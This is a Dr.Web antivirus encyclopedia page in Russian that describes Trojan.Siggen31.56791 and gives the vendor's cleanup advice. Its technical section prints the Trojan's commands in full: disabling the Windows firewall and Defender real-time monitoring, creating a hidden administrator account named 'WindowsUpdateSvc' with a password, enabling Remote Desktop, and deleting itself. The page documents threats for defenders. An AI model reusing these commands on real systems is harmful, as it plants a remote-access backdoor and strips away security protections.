Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen31.56791

Добавлен в вирусную базу Dr.Web: 2025-09-17

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
  • [HKLM\SYSTEM\CurrentControlSet\Services\TermService] 'Start' = '00000002'
  • [HKLM\SYSTEM\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Вредоносные функции
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра
  • [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
  • [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue" -ExecutionPolicy Bypass
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue" -ExecutionPolicy Bypass
Запускает на исполнение
  • '<SYSTEM32>\net.exe' user WindowsUpdateSvc MySecurePass123! /add
  • '<SYSTEM32>\net.exe' localgroup "Remote Desktop Users" WindowsUpdateSvc /add
  • '<SYSTEM32>\netsh.exe' advfirewall firewall set rule group="Remote Desktop" new enable=Yes
  • '<SYSTEM32>\netsh.exe' advfirewall firewall set rule group="Удаленный рабочий стол" new enable=Yes
  • '<SYSTEM32>\net.exe' stop TermService /y
  • '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
  • '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state on
  • '<SYSTEM32>\net.exe' localgroup "Administrators" WindowsUpdateSvc /add
Изменения в файловой системе
Создает следующие файлы
  • %APPDATA%\ipcache.dat
  • %ALLUSERSPROFILE%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_8cf7b530-613e-439b-a8c5-ccfc0e745400
Сетевая активность
Подключается к
  • 'ap#.#pify.org':443
  • 'ip##pi.com':80
  • 'ap#.##legram.org':443
TCP
Запросы HTTP GET
  • http://ip##pi.com/json/185.93.40.66
Другие
  • 'ap#.#pify.org':443
  • 'ap#.##legram.org':443
UDP
  • DNS ASK ap#.#pify.org
  • DNS ASK ip##pi.com
  • DNS ASK ap#.##legram.org
Другое
Запускает на исполнение
  • '<SYSTEM32>\net1.exe' user WindowsUpdateSvc MySecurePass123! /add
  • '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" WindowsUpdateSvc /add
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command " $user = "WindowsUpdateSvc" $privilege = "SeRemoteInteractiveLogonRight" $tmp = [System.IO.Path]::GetTempFileName() sec...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command " Get-NetConnectionProfile | ForEach-Object { Set-NetConnectionProfile -InterfaceIndex $_.InterfaceIndex -NetworkCategory Private } ...
  • '<SYSTEM32>\sc.exe' config TermService start= auto
  • '<SYSTEM32>\net1.exe' stop TermService /y
  • '<SYSTEM32>\net.exe' start TermService
  • '<SYSTEM32>\net1.exe' start TermService
  • '<SYSTEM32>\gpupdate.exe' /force
  • '<SYSTEM32>\net1.exe' localgroup "Administrators" WindowsUpdateSvc /add
  • '<SYSTEM32>\net.exe' localgroup "Administrators"
  • '<SYSTEM32>\net1.exe' localgroup "Administrators"
  • '<SYSTEM32>\cmd.exe' /C timeout 3 >nul & del /F /Q "<Полный путь к файлу>"
  • '<SYSTEM32>\timeout.exe' 3

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке